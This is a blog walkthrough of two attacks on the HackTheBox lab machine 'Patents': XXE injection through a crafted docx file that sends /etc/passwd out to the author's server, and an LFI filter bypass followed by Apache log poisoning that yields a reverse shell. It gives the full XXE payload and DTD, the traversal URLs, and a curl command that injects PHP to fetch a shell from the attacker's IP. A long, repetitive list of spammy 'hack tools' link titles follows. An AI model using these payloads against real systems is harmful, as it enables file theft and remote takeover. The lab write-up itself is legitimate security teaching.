วันพฤหัสบดีที่ 18 มกราคม พ.ศ. 2567

XXE In Docx Files And LFI To RCE


In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."
What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.
  1. Extract the docx file.
  2. Embed our payload in the extracted files.
  3. Archive the file back in the docx format.
  4. Upload the file on the server.
To extract the docx file we will use the unzip Linux command line tool.
mkdir doc cd doc unzip ../sample.docx 
Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.
mkdir customXml cd customXml vim item1.xml 
Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r> 
Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>"> 
What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.
zip -r sample.docx * 
here -r means recursive and * means all files sample.docx is the output file.
Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.
Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:
python -m SimpleHTTPServer 8090 
and then upload the file to the server and see if it works.
We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.
Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:
cat passwd.64 | base64 -d > passwd
looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:
http://10.10.10.173/getPatent_alphav1.0.php 

We can use the id parameter to view the uploaded patents like this:
http://10.10.10.173/getPatent_alphav1.0.php?id=1 

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd 

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log 
As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables  to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.
Lets setup our reverse shell listener:
nc -lvnp 9999 
and then perfrom a request to the target server with our php code like this:
curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>" 
and lastly lets access the apache access.log file via the LFI on the target server:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3 
Boom! we have a shell.

That's it for today's article see you next time.

References

Related articles

  1. Hacking Tools For Beginners
  2. Hack Tools
  3. Hacker Tools List
  4. Physical Pentest Tools
  5. Hack Tools 2019
  6. Hacker Tools For Windows
  7. Hack App
  8. Hacks And Tools
  9. Game Hacking
  10. Free Pentest Tools For Windows
  11. Hacker Tools Software
  12. New Hack Tools
  13. Pentest Tools
  14. Hacking Tools For Windows Free Download
  15. Game Hacking
  16. Pentest Tools Download
  17. Tools Used For Hacking
  18. Hacker Tools
  19. Pentest Tools Open Source
  20. Pentest Tools For Ubuntu
  21. Hack Tools For Pc
  22. Hack Tools For Mac
  23. Nsa Hack Tools Download
  24. Hack Tools For Windows
  25. Pentest Tools For Android
  26. Hacking Tools For Windows Free Download
  27. Hacking Tools Windows
  28. Pentest Tools List
  29. Top Pentest Tools
  30. Pentest Tools Bluekeep
  31. Pentest Tools Free
  32. Top Pentest Tools
  33. Hacking Tools For Windows Free Download
  34. Hack Tools Download
  35. Beginner Hacker Tools
  36. Hack Tools For Pc
  37. Underground Hacker Sites
  38. Hacker Tools Software
  39. Hacking Tools For Mac
  40. Pentest Tools Website Vulnerability
  41. How To Make Hacking Tools
  42. Hack Tools
  43. Hacking Tools For Windows
  44. Pentest Tools Tcp Port Scanner
  45. Hacking Tools For Windows
  46. Hacking Tools For Mac
  47. Hacker Tool Kit
  48. Hack Apps
  49. Best Hacking Tools 2019
  50. Pentest Box Tools Download
  51. Pentest Tools Apk
  52. Hacker Tools 2019
  53. Hacker Tools Apk
  54. Hacker Security Tools
  55. Hacking Tools Software
  56. How To Make Hacking Tools
  57. Pentest Tools Github
  58. Hack Tools 2019
  59. Hacking Tools 2020
  60. Nsa Hack Tools Download
  61. Pentest Tools Url Fuzzer
  62. Hack Tools For Pc
  63. Pentest Tools For Windows
  64. Pentest Tools Url Fuzzer
  65. Tools Used For Hacking
  66. Hack Tool Apk
  67. Termux Hacking Tools 2019
  68. Pentest Box Tools Download
  69. Hack Tool Apk
  70. Hack Tools Pc
  71. Hack Tools 2019
  72. Hack Tools Online
  73. What Are Hacking Tools
  74. Hackers Toolbox
  75. Pentest Tools Free
  76. Pentest Tools Bluekeep
  77. Pentest Tools Github
  78. Hacking Tools 2019
  79. Hacking Tools Pc
  80. Github Hacking Tools
  81. Hacker Tools For Windows
  82. Pentest Tools Port Scanner
  83. Hack Tools For Ubuntu
  84. Pentest Tools Kali Linux
  85. Game Hacking
  86. Hacker Hardware Tools
  87. Hacking Tools 2019
  88. Hacker Tools List
  89. What Is Hacking Tools
  90. Hacking Tools Mac
  91. How To Install Pentest Tools In Ubuntu
  92. Hacking Tools Windows 10
  93. What Is Hacking Tools
  94. Nsa Hack Tools Download
  95. Wifi Hacker Tools For Windows
  96. Wifi Hacker Tools For Windows
  97. Hacking App
  98. Easy Hack Tools
  99. Pentest Tools For Android
  100. Pentest Box Tools Download
  101. Hacking Tools For Pc
  102. Pentest Tools Windows
  103. Hacking Tools For Windows 7
  104. Usb Pentest Tools
  105. Hacker Tools Free Download
  106. Underground Hacker Sites
  107. Pentest Automation Tools
  108. Hacking Tools Github
  109. Pentest Recon Tools
  110. What Are Hacking Tools
  111. Beginner Hacker Tools
  112. Hack Tools Download
  113. Hacking Tools Pc
  114. Hack Tools Pc
  115. Hacking Tools Download
  116. Pentest Tools For Mac
  117. Pentest Tools Alternative
  118. Hacking Tools Mac
  119. Pentest Tools Port Scanner
  120. Hacker Tools Free Download
  121. Hacking Tools For Beginners
  122. Github Hacking Tools
  123. New Hack Tools
  124. Ethical Hacker Tools
  125. Hack Tools For Pc
  126. Hackers Toolbox
  127. Ethical Hacker Tools
  128. Kik Hack Tools
  129. Hacker Tools
  130. Hacking Tools For Kali Linux
  131. New Hacker Tools
  132. Pentest Tools For Mac
  133. New Hacker Tools
  134. Hack Apps
  135. Pentest Tools Apk
  136. Hacking Tools
  137. Hacking Tools And Software
  138. Pentest Tools Online
  139. Hacker Tools Free
  140. Bluetooth Hacking Tools Kali
  141. Hack Tools
  142. Hack Apps
  143. Beginner Hacker Tools
  144. Best Pentesting Tools 2018
  145. Hackrf Tools
  146. Pentest Tools Bluekeep
  147. Hack Tools 2019
  148. New Hacker Tools
  149. Hacking Tools Windows 10
  150. Nsa Hack Tools
  151. Hack Tools Pc
  152. Hacker Security Tools
  153. Hacker Tools Linux
  154. Pentest Tools Website
  155. Hack Tools Download
  156. Hack Tools Pc
  157. Hacking Tools For Games
  158. Hack And Tools
  159. Bluetooth Hacking Tools Kali
  160. What Are Hacking Tools
  161. Hacking Tools 2019
  162. Hacker Tools Free Download
  163. Free Pentest Tools For Windows

ไม่มีความคิดเห็น:

แสดงความคิดเห็น